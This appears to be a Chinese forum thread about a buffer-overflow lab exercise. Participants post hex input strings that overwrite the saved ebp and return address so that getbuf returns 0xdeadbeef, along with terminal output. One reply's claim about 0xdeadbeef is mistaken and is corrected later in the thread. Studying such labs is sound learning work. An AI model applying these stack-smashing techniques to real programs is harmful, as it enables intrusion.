【好玩】缓冲区溢出攻击实验

rootkitT

进来晚了，你们都说完了我才看见

上面的兄弟，小弟顶一下先

win_hate

其实还可以讨论的，如果不介意程序崩溃，可以这么做：

aero

[quote]原帖由 "win_hate"]其实还可以讨论的，如果不介意程序崩溃，可以这么做：[/quote 发表：

   ^_^，好，又换了个思路，彻底改变了val变量的位置。
偶的：

1. 
   
2. [yangwl:/home/users50/yangwl/test/converse]$ ./a.out
   
3. Type Hex string:ef be ad de 56 67 78 89 90 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 d4 ef ff bf c5 84 04 08
   
4. getbuf returned 0xdeadbeef
   
5. Segmentation fault
   
6. [yangwl:/home/users50/yangwl/test/converse]$
   

复制代码

aero

win_hate其实，这种思路，也可以不怕程序崩溃的。我们改动了ebp，在改回去就是了，一样可以返回到main里面的正常路径上去的。

1. 
   
2. [yangwl:/home/users50/yangwl/test/converse]$ ./a.out
   
3. Type Hex string:ef be ad de e8 fb ff bf 17 85 04 08 13 14 15 16 17 18 19 20 21 22 23 24 d4 ef ff bf c5 84 04 08
   
4. getbuf returned 0xdeadbeef
   
5. [yangwl:/home/users50/yangwl/test/converse]$
   

复制代码

win_hate

改哪里，如何改？

aero

[yangwl:/home/users50/yangwl/test/converse]$ ./a.out
Type Hex string:ef be ad de e8 fb ff bf 17 85 04 08 13 14 15 16 17 18 19 20 21 22 23 24 d4 ef ff bf c5 84 04 08
getbuf returned 0xdeadbeef
[yangwl:/home/users50/yangwl/test/converse]$

这里，把main里面的ebp和指令地址在完好的给改回去不就好了？

win_hate

在我的系统上不行，你看看我给出的串，我已经给出了相应地址。

在我的系统上，似乎 printf 会覆盖我填进去的值。

aero

^_^，好好看看。想看到结论。加油。

Solaris12

[quote]原帖由 "converse"]见这副图，如果我输入的值只到0xdeadbeef的时候程序就会出现"segmentation fault",win_hate能解释一下为什么吗？？[/quote 发表：


deadbeef的意思是使用了已经被free了的内存，
当然会有段错误了！

aero

原帖由 "Solaris12" 发表：


deadbeef的意思是使用了已经被free了的内存，
当然会有段错误了！

不是吧。上面win_hate已经说的很明白了，是因为后面的'\0'会破坏test压入的ebp，以致于无法在返回main函数的时候，进入正确的“轨道”。